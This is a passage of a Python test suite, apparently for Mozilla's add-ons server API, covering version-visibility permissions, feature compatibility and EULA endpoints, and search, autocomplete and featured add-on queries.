UserProfile.objects.create(username='simpleuser') self.client.login_api(user) self.version.files.update(status=amo.STATUS_DISABLED) self._test_url_only_contains_old_version() response = self.client.get( self.url, data={'filter': 'all_without_unlisted'}) assert response.status_code == 403 response = self.client.get( self.url, data={'filter': 'all_with_deleted'}) assert response.status_code == 403 def test_deleted_version_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:Review') self.client.login_api(user) self.version.delete() self._test_url_only_contains_old_version() self._test_url_only_contains_old_version(filter='all_without_unlisted') response = self.client.get( self.url, data={'filter': 'all_with_deleted'}) assert response.status_code == 403 response = self.client.get( self.url, data={'filter': 'all_with_unlisted'}) assert response.status_code == 403 def test_deleted_version_author(self): user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.client.login_api(user) self.version.delete() self._test_url_only_contains_old_version() self._test_url_only_contains_old_version(filter='all_without_unlisted') response = self.client.get( self.url, data={'filter': 'all_with_deleted'}) assert response.status_code == 403 def test_deleted_version_admin(self): user = UserProfile.objects.create(username='admin') self.grant_permission(user, '*:*') self.client.login_api(user) self.version.delete() self._test_url_only_contains_old_version() self._test_url_only_contains_old_version(filter='all_without_unlisted') # An admin can see deleted versions when explicitly asking # for them. self._test_url_contains_all(filter='all_with_deleted') def test_all_with_unlisted_admin(self): user = UserProfile.objects.create(username='admin') self.grant_permission(user, '*:*') self.client.login_api(user) self._test_url_contains_all(filter='all_with_unlisted') def test_with_unlisted_unlisted_reviewer(self): user = UserProfile.objects.create(username='reviewer') self.grant_permission(user, 'Addons:ReviewUnlisted') self.client.login_api(user) self._test_url_contains_all(filter='all_with_unlisted') def test_with_unlisted_author(self): user = UserProfile.objects.create(username='author') AddonUser.objects.create(user=user, addon=self.addon) self.client.login_api(user) self._test_url_contains_all(filter='all_with_unlisted') def test_deleted_version_anonymous(self): self.version.delete() self._test_url_only_contains_old_version() response = self.client.get( self.url, data={'filter': 'all_with_deleted'}) assert response.status_code == 401 def test_all_without_and_with_unlisted_anonymous(self): response = self.client.get( self.url, data={'filter': 'all_without_unlisted'}) assert response.status_code == 401 response = self.client.get( self.url, data={'filter': 'all_with_unlisted'}) assert response.status_code == 401 def test_deleted_version_user_but_not_author(self): user = UserProfile.objects.create(username='simpleuser') self.client.login_api(user) self.version.delete() self._test_url_only_contains_old_version() response = self.client.get( self.url, data={'filter': 'all_with_deleted'}) assert response.status_code == 403 def test_all_without_and_with_unlisted_user_but_not_author(self): user = UserProfile.objects.create(username='simpleuser') self.client.login_api(user) self.version.delete() response = self.client.get( self.url, data={'filter': 'all_without_unlisted'}) assert response.status_code == 403 response = self.client.get( self.url, data={'filter': 'all_with_unlisted'}) assert response.status_code == 403 class TestAddonViewSetFeatureCompatibility(TestCase): client_class = APITestClient def setUp(self): super(TestAddonViewSetFeatureCompatibility, self).setUp() self.addon = addon_factory( guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon') self.url = reverse_ns( 'addon-feature-compatibility', kwargs={'pk': self.addon.pk}) def test_url(self): self.detail_url = reverse_ns( 'addon-detail', kwargs={'pk': self.addon.pk}) assert self.url == '%s%s' % (self.detail_url, 'feature_compatibility/') def test_disabled_anonymous(self): self.addon.update(disabled_by_user=True) response = self.client.get(self.url) assert response.status_code == 401 def test_feature_compatibility_unknown(self): response = self.client.get(self.url) assert response.status_code == 200 data = json.loads(response.content) assert data['e10s'] == 'unknown' def test_feature_compatibility_compatible(self): AddonFeatureCompatibility.objects.create( addon=self.addon, e10s=amo.E10S_COMPATIBLE) response = self.client.get(self.url) assert response.status_code == 200 data = json.loads(response.content) assert data['e10s'] == 'compatible' class TestAddonViewSetEulaPolicy(TestCase): client_class = APITestClient def setUp(self): super(TestAddonViewSetEulaPolicy, self).setUp() self.addon = addon_factory( guid=generate_addon_guid(), name=u'My Addôn', slug='my-addon') self.url = reverse_ns( 'addon-eula-policy', kwargs={'pk': self.addon.pk}) def test_url(self): self.detail_url = reverse_ns( 'addon-detail', kwargs={'pk': self.addon.pk}) assert self.url == '%s%s' % (self.detail_url, 'eula_policy/') def test_disabled_anonymous(self): self.addon.update(disabled_by_user=True) response = self.client.get(self.url) assert response.status_code == 401 def test_policy_none(self): response = self.client.get(self.url) assert response.status_code == 200 data = json.loads(response.content) assert data['eula'] is None assert data['privacy_policy'] is None def test_policy(self): self.addon.eula = {'en-US': u'My Addôn EULA', 'fr': u'Hoüla'} self.addon.privacy_policy = u'My Prïvacy, My Policy' self.addon.save() response = self.client.get(self.url) assert response.status_code == 200 data = json.loads(response.content) assert data['eula'] == {'en-US': u'My Addôn EULA', 'fr': u'Hoüla'} assert data['privacy_policy'] == {'en-US': u'My Prïvacy, My Policy'} class TestAddonSearchView(ESTestCase): client_class = APITestClient fixtures = ['base/users'] def setUp(self): super(TestAddonSearchView, self).setUp() self.url = reverse_ns('addon-search') def tearDown(self): super(TestAddonSearchView, self).tearDown() self.empty_index('default') self.refresh() def test_get_queryset_excludes(self): addon_factory(slug='my-addon', name=u'My Addôn', weekly_downloads=666) addon_factory(slug='my-second-addon', name=u'My second Addôn', weekly_downloads=555) self.refresh() view = AddonSearchView() view.request = APIRequestFactory().get('/') qset = view.get_queryset() assert set(qset.to_dict()['_source']['excludes']) == set( ('*.raw', 'boost', 'hotness', 'name', 'description', 'name_l10n_*', 'description_l10n_*', 'summary', 'summary_l10n_*') ) response = qset.execute() source_keys = response.hits.hits[0]['_source'].keys() # TODO: 'name', 'description', 'hotness' and 'summary' are in there... # for some reason I don't yet understand... (cgrebs 0717) # maybe because they're used for boosting or filtering or so? assert not any(key in source_keys for key in ( 'boost', )) assert not any( key.startswith('name_l10n_') for key in source_keys ) assert not any( key.startswith('description_l10n_') for key in source_keys ) assert not any( key.startswith('summary_l10n_') for key in source_keys ) def perform_search(self, url, data=None, expected_status=200, **headers): # Just to cache the waffle switch, to avoid polluting the # assertNumQueries() call later. waffle.switch_is_active('boost-webextensions-in-search') with self.assertNumQueries(0): response = self.client.get(url, data, **headers) assert response.status_code == expected_status, response.content data = json.loads(response.content) return data def test_basic(self): addon = addon_factory(slug='my-addon', name=u'My Addôn', weekly_downloads=666) addon2 = addon_factory(slug='my-second-addon', name=u'My second Addôn', weekly_downloads=555) self.refresh() data = self.perform_search(self.url) # No query. assert data['count'] == 2 assert len(data['results']) == 2 result = data['results'][0] assert result['id'] == addon.pk assert result['name'] == {'en-US': u'My Addôn'} assert result['slug'] == 'my-addon' assert result['last_updated'] == ( addon.last_updated.replace(microsecond=0).isoformat() + 'Z') # latest_unlisted_version should never be exposed in public search. assert 'latest_unlisted_version' not in result result = data['results'][1] assert result['id'] == addon2.pk assert result['name'] == {'en-US': u'My second Addôn'} assert result['slug'] == 'my-second-addon' # latest_unlisted_version should never be exposed in public search. assert 'latest_unlisted_version' not in result def test_empty(self): data = self.perform_search(self.url) assert data['count'] == 0 assert len(data['results']) == 0 def test_es_queries_made_no_results(self): with patch.object( Elasticsearch, 'search', wraps=amo.search.get_es().search) as search_mock: data = self.perform_search(self.url, data={'q': 'foo'}) assert data['count'] == 0 assert len(data['results']) == 0 assert search_mock.call_count == 1 def test_es_queries_made_some_result(self): addon_factory(slug='foormidable', name=u'foo') addon_factory(slug='foobar', name=u'foo') self.refresh() with patch.object( Elasticsearch, 'search', wraps=amo.search.get_es().search) as search_mock: data = self.perform_search( self.url, data={'q': 'foo', 'page_size': 1}) assert data['count'] == 2 assert len(data['results']) == 1 assert search_mock.call_count == 1 def test_no_unlisted(self): addon_factory(slug='my-addon', name=u'My Addôn', status=amo.STATUS_NULL, weekly_downloads=666, version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED}) self.refresh() data = self.perform_search(self.url) assert data['count'] == 0 assert len(data['results']) == 0 def test_pagination(self): addon = addon_factory(slug='my-addon', name=u'My Addôn', weekly_downloads=33) addon2 = addon_factory(slug='my-second-addon', name=u'My second Addôn', weekly_downloads=22) addon_factory(slug='my-third-addon', name=u'My third Addôn', weekly_downloads=11) self.refresh() data = self.perform_search(self.url, {'page_size': 1}) assert data['count'] == 3 assert len(data['results']) == 1 result = data['results'][0] assert result['id'] == addon.pk assert result['name'] == {'en-US': u'My Addôn'} assert result['slug'] == 'my-addon' # Search using the second page URL given in return value. data = self.perform_search(data['next']) assert data['count'] == 3 assert len(data['results']) == 1 result = data['results'][0] assert result['id'] == addon2.pk assert result['name'] == {'en-US': u'My second Addôn'} assert result['slug'] == 'my-second-addon' def test_pagination_sort_and_query(self): addon_factory(slug='my-addon', name=u'Cy Addôn') addon2 = addon_factory(slug='my-second-addon', name=u'By second Addôn') addon1 = addon_factory(slug='my-first-addon', name=u'Ay first Addôn') addon_factory(slug='only-happy-when-itrains', name=u'Garbage') self.refresh() data = self.perform_search(self.url, { 'page_size': 1, 'q': u'addôn', 'sort': 'name'}) assert data['count'] == 3 assert len(data['results']) == 1 result = data['results'][0] assert result['id'] == addon1.pk assert result['name'] == {'en-US': u'Ay first Addôn'} # Search using the second page URL given in return value. assert 'sort=name' in data['next'] data = self.perform_search(data['next']) assert data['count'] == 3 assert len(data['results']) == 1 assert 'sort=name' in data['previous'] result = data['results'][0] assert result['id'] == addon2.pk assert result['name'] == {'en-US': u'By second Addôn'} def test_filtering_only_reviewed_addons(self): public_addon = addon_factory(slug='my-addon', name=u'My Addôn', weekly_downloads=222) addon_factory(slug='my-incomplete-addon', name=u'My incomplete Addôn', status=amo.STATUS_NULL) addon_factory(slug='my-disabled-addon', name=u'My disabled Addôn', status=amo.STATUS_DISABLED) addon_factory(slug='my-unlisted-addon', name=u'My unlisted Addôn', version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED}) addon_factory(slug='my-disabled-by-user-addon', name=u'My disabled by user Addôn', disabled_by_user=True) self.refresh() data = self.perform_search(self.url) assert data['count'] == 1 assert len(data['results']) == 1 result = data['results'][0] assert result['id'] == public_addon.pk assert result['name'] == {'en-US': u'My Addôn'} assert result['slug'] == 'my-addon' def test_with_query(self): addon = addon_factory(slug='my-addon', name=u'My Addon', tags=['some_tag']) addon_factory(slug='unrelated', name=u'Unrelated') self.refresh() data = self.perform_search(self.url, {'q': 'addon'}) assert data['count'] == 1 assert len(data['results']) == 1 result = data['results'][0] assert result['id'] == addon.pk assert result['name'] == {'en-US': u'My Addon'} assert result['slug'] == 'my-addon' def test_with_session_cookie(self): # Session cookie should be ignored, therefore a request with it should # not cause more database queries. self.client.login(email='regular@mozilla.com') data = self.perform_search(self.url) assert data['count'] == 0 assert len(data['results']) == 0 def test_filter_by_type(self): addon = addon_factory(slug='my-addon', name=u'My Addôn') theme = addon_factory(slug='my-theme', name=u'My Thème', type=amo.ADDON_THEME) addon_factory(slug='my-search', name=u'My Seárch', type=amo.ADDON_SEARCH) self.refresh() data = self.perform_search(self.url, {'type': 'extension'}) assert data['count'] == 1 assert len(data['results']) == 1 assert data['results'][0]['id'] == addon.pk data = self.perform_search(self.url, {'type': 'theme'}) assert data['count'] == 1 assert len(data['results']) == 1 assert data['results'][0]['id'] == theme.pk data = self.perform_search(self.url, {'type': 'theme,extension'}) assert data['count'] == 2 assert len(data['results']) == 2 result_ids = (data['results'][0]['id'], data['results'][1]['id']) assert sorted(result_ids) == [addon.pk, theme.pk] @patch('olympia.addons.models.get_featured_ids') def test_filter_by_featured_no_app_no_lang(self, get_featured_ids_mock): addon = addon_factory(slug='my-addon', name=u'Featured Addôn') addon_factory(slug='other-addon', name=u'Other Addôn') get_featured_ids_mock.return_value = [addon.pk] assert addon.is_featured() self.reindex(Addon) data = self.perform_search(self.url, {'featured': 'true'}) assert data['count'] == 1 assert len(data['results']) == 1 assert data['results'][0]['id'] == addon.pk def test_filter_by_featured_app_and_langs(self): fx_addon = addon_factory(slug='my-addon', name=u'Featured Addôn') collection = collection_factory() FeaturedCollection.objects.create( collection=collection, application=amo.FIREFOX.id) collection.add_addon(fx_addon) fx_fr_addon = addon_factory(slug='my-addon', name=u'Lé Featured Addôn') collection = collection_factory() FeaturedCollection.objects.create( collection=collection, application=amo.FIREFOX.id, locale='fr') collection.add_addon(fx_fr_addon) fn_addon = addon_factory(slug='my-addon', name=u'Featured Addôn 2 go') collection = collection_factory() FeaturedCollection.objects.create( collection=collection, application=amo.ANDROID.id) collection.add_addon(fn_addon) fn_fr_addon = addon_factory(slug='my-addon', name=u'Lé Featured Mobil') collection = collection_factory() FeaturedCollection.objects.create( collection=collection, application=amo.ANDROID.id, locale='fr') collection.add_addon(fn_fr_addon) addon_factory(slug='other-addon', name=u'Other Addôn') self.reindex(Addon) # Searching for just Firefox should return the two Firefox collections. # The filter should be `Q('term', **{'featured_for.application': app})` data = self.perform_search(self.url, {'featured': 'true', 'app': 'firefox'}) assert data['count'] == 2 == len(data['results']) ids = {data['results'][0]['id'], data['results'][1]['id']} self.assertSetEqual(ids, {fx_addon.pk, fx_fr_addon.pk}) # If we specify lang 'fr' too it should be the same collections. # In addition to the app query above, this will be executed too: # `Q('terms', **{'featured_for.locales': [locale, 'ALL']}))` data = self.perform_search( self.url, {'featured': 'true', 'app': 'firefox', 'lang': 'fr'}) assert data['count'] == 2 == len(data['results']) ids = {data['results'][0]['id'], data['results'][1]['id']} self.assertSetEqual(ids, {fx_addon.pk, fx_fr_addon.pk}) # But 'en-US' will exclude the 'fr' collection. data = self.perform_search( self.url, {'featured': 'true', 'app': 'firefox', 'lang': 'en-US'}) assert data['count'] == 1 == len(data['results']) assert data['results'][0]['id'] == fx_addon.pk # If we only search for lang, application is ignored. # Just `Q('terms', **{'featured_for.locales': [locale, 'ALL']}))` now. data = self.perform_search( self.url, {'featured': 'true', 'lang': 'en-US'}) assert data['count'] == 2 == len(data['results']) ids = {data['results'][0]['id'], data['results'][1]['id']} self.assertSetEqual(ids, {fx_addon.pk, fn_addon.pk}) data = self.perform_search( self.url, {'featured': 'true', 'lang': 'fr'}) assert data['count'] == 4 == len(data['results']) ids = {data['results'][0]['id'], data['results'][1]['id'], data['results'][2]['id'], data['results'][3]['id']} self.assertSetEqual( ids, {fx_addon.pk, fx_fr_addon.pk, fn_addon.pk, fn_fr_addon.pk}) def test_filter_by_platform(self): # First add-on is available for all platforms. addon = addon_factory(slug='my-addon', name=u'My Addôn', weekly_downloads=33) addon_factory( slug='my-linux-addon', name=u'My linux-only Addön', file_kw={'platform': amo.PLATFORM_LINUX.id}, weekly_downloads=22) mac_addon = addon_factory( slug='my-mac-addon', name=u'My mac-only Addön', file_kw={'platform': amo.PLATFORM_MAC.id}, weekly_downloads=11) self.refresh() data = self.perform_search(self.url) assert data['count'] == 3 assert len(data['results']) == 3 assert data['results'][0]['id'] == addon.pk data = self.perform_search(self.url, {'platform': 'mac'}) assert data['count'] == 2 assert len(data['results']) == 2 assert data['results'][0]['id'] == addon.pk assert data['results'][1]['id'] == mac_addon.pk def test_filter_by_app(self): addon = addon_factory( slug='my-addon', name=u'My Addôn', weekly_downloads=33, version_kw={'min_app_version': '42.0', 'max_app_version': '*'}) tb_addon = addon_factory( slug='my-tb-addon', name=u'My TBV Addøn', weekly_downloads=22, version_kw={'application': amo.THUNDERBIRD.id, 'min_app_version': '42.0', 'max_app_version': '*'}) both_addon = addon_factory( slug='my-both-addon', name=u'My Both Addøn', weekly_downloads=11, version_kw={'min_app_version': '43.0', 'max_app_version': '*'}) # both_addon was created with firefox compatibility, manually add # thunderbird, making it compatible with both. ApplicationsVersions.objects.create( application=amo.THUNDERBIRD.id, version=both_addon.current_version, min=AppVersion.objects.create( application=amo.THUNDERBIRD.id, version='43.0'), max=AppVersion.objects.get( application=amo.THUNDERBIRD.id, version='*')) # Because the manually created ApplicationsVersions was created after # the initial save, we need to reindex and not just refresh. self.reindex(Addon) data = self.perform_search(self.url, {'app': 'firefox'}) assert data['count'] == 2 assert len(data['results']) == 2 assert data['results'][0]['id'] == addon.pk assert data['results'][1]['id'] == both_addon.pk data = self.perform_search(self.url, {'app': 'thunderbird'}) assert data['count'] == 2 assert len(data['results']) == 2 assert data['results'][0]['id'] == tb_addon.pk assert data['results'][1]['id'] == both_addon.pk def test_filter_by_appversion(self): addon = addon_factory( slug='my-addon', name=u'My Addôn', weekly_downloads=33, version_kw={'min_app_version': '42.0', 'max_app_version': '*'}) tb_addon = addon_factory( slug='my-tb-addon', name=u'My TBV Addøn', weekly_downloads=22, version_kw={'application': amo.THUNDERBIRD.id, 'min_app_version': '42.0', 'max_app_version': '*'}) both_addon = addon_factory( slug='my-both-addon', name=u'My Both Addøn', weekly_downloads=11, version_kw={'min_app_version': '43.0', 'max_app_version': '*'}) # both_addon was created with firefox compatibility, manually add # thunderbird, making it compatible with both. ApplicationsVersions.objects.create( application=amo.THUNDERBIRD.id, version=both_addon.current_version, min=AppVersion.objects.create( application=amo.THUNDERBIRD.id, version='43.0'), max=AppVersion.objects.get( application=amo.THUNDERBIRD.id, version='*')) # Because the manually created ApplicationsVersions was created after # the initial save, we need to reindex and not just refresh. self.reindex(Addon) data = self.perform_search(self.url, {'app': 'firefox', 'appversion': '46.0'}) assert data['count'] == 2 assert len(data['results']) == 2 assert data['results'][0]['id'] == addon.pk assert data['results'][1]['id'] == both_addon.pk data = self.perform_search(self.url, {'app': 'thunderbird', 'appversion': '43.0.1'}) assert data['count'] == 2 assert len(data['results']) == 2 assert data['results'][0]['id'] == tb_addon.pk assert data['results'][1]['id'] == both_addon.pk data = self.perform_search(self.url, {'app': 'firefox', 'appversion': '42.0'}) assert data['count'] == 1 assert len(data['results']) == 1 assert data['results'][0]['id'] == addon.pk data = self.perform_search(self.url, {'app': 'thunderbird', 'appversion': '42.0.1'}) assert data['count'] == 1 assert len(data['results']) == 1 assert data['results'][0]['id'] == tb_addon.pk def test_filter_by_category(self): static_category = ( CATEGORIES[amo.FIREFOX.id][amo.ADDON_EXTENSION]['alerts-updates']) category = Category.from_static_category(static_category, True) addon = addon_factory( slug='my-addon', name=u'My Addôn', category=category) self.refresh() # Create an add-on in a different category. static_category = ( CATEGORIES[amo.FIREFOX.id][amo.ADDON_EXTENSION]['tabs']) other_category = Category.from_static_category(static_category, True) addon_factory(slug='different-addon', category=other_category) self.refresh() # Search for add-ons in the first category. There should be only one. data = self.perform_search(self.url, {'app': 'firefox', 'type': 'extension', 'category': category.slug}) assert data['count'] == 1 assert len(data['results']) == 1 assert data['results'][0]['id'] == addon.pk def test_filter_by_category_multiple_types(self): def get_category(type_, name): static_category = ( CATEGORIES[amo.FIREFOX.id][type_][name]) return Category.from_static_category(static_category, True) addon_lwt = addon_factory( slug='my-addon-lwt', name=u'My Addôn LWT', category=get_category(amo.ADDON_PERSONA, 'holiday'), type=amo.ADDON_PERSONA) addon_st = addon_factory( slug='my-addon-st', name=u'My Addôn ST', category=get_category(amo.ADDON_STATICTHEME, 'holiday'), type=amo.ADDON_STATICTHEME) self.refresh() # Create some add-ons in a different category. addon_factory( slug='different-addon-lwt', name=u'Diff Addôn LWT', category=get_category(amo.ADDON_PERSONA, 'sports'), type=amo.ADDON_PERSONA) addon_factory( slug='different-addon-st', name=u'Diff Addôn ST', category=get_category(amo.ADDON_STATICTHEME, 'sports'), type=amo.ADDON_STATICTHEME) self.refresh() # Search for add-ons in the first category. There should be two. data = self.perform_search(self.url, {'app': 'firefox', 'type': 'persona,statictheme', 'category': 'holiday'}) assert data['count'] == 2 assert len(data['results']) == 2 result_ids = (data['results'][0]['id'], data['results'][1]['id']) assert sorted(result_ids) == [addon_lwt.pk, addon_st.pk] def test_filter_with_tags(self): addon = addon_factory(slug='my-addon', name=u'My Addôn', tags=['some_tag'], weekly_downloads=999) addon2 = addon_factory(slug='another-addon', name=u'Another Addôn', tags=['unique_tag', 'some_tag'], weekly_downloads=333) addon3 = addon_factory(slug='unrelated', name=u'Unrelated', tags=['unrelated']) self.refresh() data = self.perform_search(self.url, {'tag': 'some_tag'}) assert data['count'] == 2 assert len(data['results']) == 2 result = data['results'][0] assert result['id'] == addon.pk assert result['slug'] == addon.slug assert result['tags'] == ['some_tag'] result = data['results'][1] assert result['id'] == addon2.pk assert result['slug'] == addon2.slug assert result['tags'] == ['some_tag', 'unique_tag'] data = self.perform_search(self.url, {'tag': 'unrelated'}) assert data['count'] == 1 assert len(data['results']) == 1 result = data['results'][0] assert result['id'] == addon3.pk assert result['slug'] == addon3.slug assert result['tags'] == ['unrelated'] data = self.perform_search(self.url, {'tag': 'unique_tag,some_tag'}) assert data['count'] == 1 assert len(data['results']) == 1 result = data['results'][0] assert result['id'] == addon2.pk assert result['slug'] == addon2.slug assert result['tags'] == ['some_tag', 'unique_tag'] def test_bad_filter(self): data = self.perform_search( self.url, {'app': 'lol'}, expected_status=400) assert data == ['Invalid "app" parameter.'] def test_filter_by_author(self): author = user_factory(username=u'my-fancyAuthôr') addon = addon_factory(slug='my-addon', name=u'My Addôn', tags=['some_tag'], weekly_downloads=999) AddonUser.objects.create(addon=addon, user=author) addon2 = addon_factory(slug='another-addon', name=u'Another Addôn', tags=['unique_tag', 'some_tag'], weekly_downloads=333) author2 = user_factory(username=u'my-FancyAuthôrName') AddonUser.objects.create(addon=addon2, user=author2) self.reindex(Addon) data = self.perform_search(self.url, {'author': u'my-fancyAuthôr'}) assert data['count'] == 1 assert len(data['results']) == 1 result = data['results'][0] assert result['id'] == addon.pk assert result['slug'] == addon.slug def test_filter_by_multiple_authors(self): author = user_factory(username='foo') author2 = user_factory(username='bar') another_author = user_factory(username='someoneelse') addon = addon_factory(slug='my-addon', name=u'My Addôn', tags=['some_tag'], weekly_downloads=999) AddonUser.objects.create(addon=addon, user=author) AddonUser.objects.create(addon=addon, user=author2) addon2 = addon_factory(slug='another-addon', name=u'Another Addôn', tags=['unique_tag', 'some_tag'], weekly_downloads=333) AddonUser.objects.create(addon=addon2, user=author2) another_addon = addon_factory() AddonUser.objects.create(addon=another_addon, user=another_author) self.reindex(Addon) data = self.perform_search(self.url, {'author': u'foo,bar'}) assert data['count'] == 2 assert len(data['results']) == 2 result = data['results'][0] assert result['id'] == addon.pk assert result['slug'] == addon.slug result = data['results'][1] assert result['id'] == addon2.pk assert result['slug'] == addon2.slug def test_filter_by_guid(self): addon = addon_factory(slug='my-addon', name=u'My Addôn', guid='random@guid', weekly_downloads=999) addon_factory() self.reindex(Addon) data = self.perform_search(self.url, {'guid': u'random@guid'}) assert data['count'] == 1 assert len(data['results']) == 1 result = data['results'][0] assert result['id'] == addon.pk assert result['slug'] == addon.slug def test_filter_by_multiple_guid(self): addon = addon_factory(slug='my-addon', name=u'My Addôn', guid='random@guid', weekly_downloads=999) addon2 = addon_factory(slug='another-addon', name=u'Another Addôn', guid='random2@guid', weekly_downloads=333) addon_factory() self.reindex(Addon) data = self.perform_search( self.url, {'guid': u'random@guid,random2@guid'}) assert data['count'] == 2 assert len(data['results']) == 2 result = data['results'][0] assert result['id'] == addon.pk assert result['slug'] == addon.slug result = data['results'][1] assert result['id'] == addon2.pk assert result['slug'] == addon2.slug # Throw in soome random invalid guids too that will be ignored. data = self.perform_search( self.url, { 'guid': u'random@guid,invalid@guid,notevenaguid$,random2@guid'} ) assert data['count'] == len(data['results']) == 2 assert data['results'][0]['id'] == addon.pk assert data['results'][1]['id'] == addon2.pk def test_find_addon_default_non_en_us(self): with self.activate('en-GB'): addon = addon_factory( status=amo.STATUS_PUBLIC, type=amo.ADDON_EXTENSION, default_locale='en-GB', name='Banana Bonkers', description=u'Let your browser eat your bananas', summary=u'Banana Summary', ) addon.name = {'es': u'Banana Bonkers espanole'} addon.description = { 'es': u'Deje que su navegador coma sus plátanos'} addon.summary = {'es': u'resumen banana'} addon.save() addon_factory( slug='English Addon', name=u'My English Addôn') self.reindex(Addon) for locale in ('en-US', 'en-GB', 'es'): with self.activate(locale): url = reverse_ns('addon-search') data = self.perform_search(url, {'lang': locale}) assert data['count'] == 2 assert len(data['results']) == 2 data = self.perform_search( url, {'q': 'Banana', 'lang': locale}) result = data['results'][0] assert result['id'] == addon.pk assert result['slug'] == addon.slug def test_exclude_addons(self): addon1 = addon_factory() addon2 = addon_factory() addon3 = addon_factory() self.refresh() # Exclude addon2 and addon3 by slug. data = self.perform_search( self.url, {'exclude_addons': u','.join( (addon2.slug, addon3.slug))}) assert len(data['results']) == 1 assert data['count'] == 1 assert data['results'][0]['id'] == addon1.pk # Exclude addon1 and addon2 by pk. data = self.perform_search( self.url, {'exclude_addons': u','.join( map(unicode, (addon2.pk, addon1.pk)))}) assert len(data['results']) == 1 assert data['count'] == 1 assert data['results'][0]['id'] == addon3.pk # Exclude addon1 by pk and addon3 by slug. data = self.perform_search( self.url, {'exclude_addons': u','.join( (unicode(addon1.pk), addon3.slug))}) assert len(data['results']) == 1 assert data['count'] == 1 assert data['results'][0]['id'] == addon2.pk def test_filter_fuzziness(self): with self.activate('de'): addon = addon_factory(slug='my-addon', name={ 'de': 'Mein Taschenmesser' }, default_locale='de') # Won't get matched, we have a prefix length of 4 so that # the first 4 characters are not analyzed for fuzziness addon_factory(slug='my-addon2', name={ 'de': u'Mein Hufrinnenmesser' }, default_locale='de') self.refresh() with self.activate('de'): data = self.perform_search(self.url, {'q': 'Taschenmssser'}) assert data['count'] == 1 assert len(data['results']) == 1 assert data['results'][0]['id'] == addon.pk def test_prevent_too_complex_to_determinize_exception(self): # too_complex_to_determinize_exception happens in elasticsearch when # we do a fuzzy query with a query string that is well, too complex, # with specific unicode chars and too long. For this reason we # deactivate fuzzy matching if the query is over 20 chars. This test # contain a string that was causing such breakage before. # Populate the index with a few add-ons first (enough to trigger the # issue locally). for i in range(0, 10): addon_factory() self.refresh() query = (u'남포역립카페추천 ˇjjtat닷컴ˇ ≡제이제이♠♣ 남포역스파 ' u'남포역op남포역유흥≡남포역안마남포역오피 ♠♣') data = self.perform_search(self.url, {'q': query}) # No results, but no 500 either. assert data['count'] == 0 class TestAddonAutoCompleteSearchView(ESTestCase): client_class = APITestClient fixtures = ['base/users'] def setUp(self): super(TestAddonAutoCompleteSearchView, self).setUp() self.url = reverse_ns('addon-autocomplete') def tearDown(self): super(TestAddonAutoCompleteSearchView, self).tearDown() self.empty_index('default') self.refresh() def perform_search(self, url, data=None, expected_status=200, **headers): # Just to cache the waffle switch, to avoid polluting the # assertNumQueries() call later. waffle.switch_is_active('boost-webextensions-in-search') with self.assertNumQueries(0): response = self.client.get(url, data, **headers) assert response.status_code == expected_status data = json.loads(response.content) return data def test_basic(self): addon = addon_factory(slug='my-addon', name=u'My Addôn') addon2 = addon_factory(slug='my-second-addon', name=u'My second Addôn') addon_factory(slug='nonsense', name=u'Nope Nope Nope') self.refresh() data = self.perform_search(self.url, {'q': 'my'}) # No db query. assert 'count' not in data assert 'next' not in data assert 'prev' not in data assert len(data['results']) == 2 assert {itm['id'] for itm in data['results']} == {addon.pk, addon2.pk} def test_type(self): addon = addon_factory( slug='my-addon', name=u'My Addôn', type=amo.ADDON_EXTENSION) addon2 = addon_factory( slug='my-second-addon', name=u'My second Addôn', type=amo.ADDON_PERSONA) addon_factory(slug='nonsense', name=u'Nope Nope Nope') addon_factory( slug='whocares', name=u'My xul theme', type=amo.ADDON_THEME) self.refresh() data = self.perform_search( self.url, {'q': 'my', 'type': 'persona,extension'}) # No db query. assert 'count' not in data assert 'next' not in data assert 'prev' not in data assert len(data['results']) == 2 assert {itm['id'] for itm in data['results']} == {addon.pk, addon2.pk} def test_default_locale_fallback_still_works_for_translations(self): addon = addon_factory(default_locale='pt-BR', name='foobar') # Couple quick checks to make sure the add-on is in the right state # before testing. assert addon.default_locale == 'pt-BR' assert addon.name.locale == 'pt-br' self.refresh() # Search in a different language than the one used for the name: we # should fall back to default_locale and find the translation. data = self.perform_search(self.url, {'q': 'foobar', 'lang': 'fr'}) assert data['results'][0]['name'] == 'foobar' # Same deal in en-US. data = self.perform_search(self.url, {'q': 'foobar', 'lang': 'en-US'}) assert data['results'][0]['name'] == 'foobar' def test_empty(self): data = self.perform_search(self.url) assert 'count' not in data assert len(data['results']) == 0 def test_get_queryset_excludes(self): addon_factory(slug='my-addon', name=u'My Addôn', weekly_downloads=666) addon_factory(slug='my-persona', name=u'My Persona', type=amo.ADDON_PERSONA) self.refresh() view = AddonAutoCompleteSearchView() view.request = APIRequestFactory().get('/') qset = view.get_queryset() includes = set(( 'default_locale', 'icon_type', 'id', 'modified', 'name_translations', 'persona', 'slug', 'type')) assert set(qset.to_dict()['_source']['includes']) == includes response = qset.execute() # Sort by type to avoid sorting problems before picking the # first result. (We have a theme and an add-on) hit = sorted(response.hits.hits, key=lambda x: x['_source']['type']) assert set(hit[1]['_source'].keys()) == includes def test_no_unlisted(self): addon_factory(slug='my-addon', name=u'My Addôn', status=amo.STATUS_NULL, weekly_downloads=666, version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED}) self.refresh() data = self.perform_search(self.url) assert 'count' not in data assert len(data['results']) == 0 def test_pagination(self): [addon_factory() for x in range(0, 11)] self.refresh() # page_size should be ignored, we should get 10 results. data = self.perform_search(self.url, {'page_size': 1}) assert 'count' not in data assert 'next' not in data assert 'prev' not in data assert len(data['results']) == 10 class TestAddonFeaturedView(TestCase): client_class = APITestClient def setUp(self): self.url = reverse_ns('addon-featured') def test_no_parameters(self): response = self.client.get(self.url) assert response.status_code == 400 assert json.loads(response.content) == { 'detail': 'Invalid app, category and/or type parameter(s).'} @patch('olympia.addons.views.get_featured_ids') def test_app_only(self, get_featured_ids_mock): addon1 = addon_factory() addon2 = addon_factory() get_featured_ids_mock.return_value = [addon1.pk, addon2.pk] response = self.client.get(self.url, {'app': 'firefox'}) assert get_featured_ids_mock.call_count == 1 assert (get_featured_ids_mock.call_args_list[0][0][0] == amo.FIREFOX) # app assert (get_featured_ids_mock.call_args_list[0][1] == {'types': None, 'lang': None}) assert response.status_code == 200 data = json.loads(response.content) assert data['results'] assert 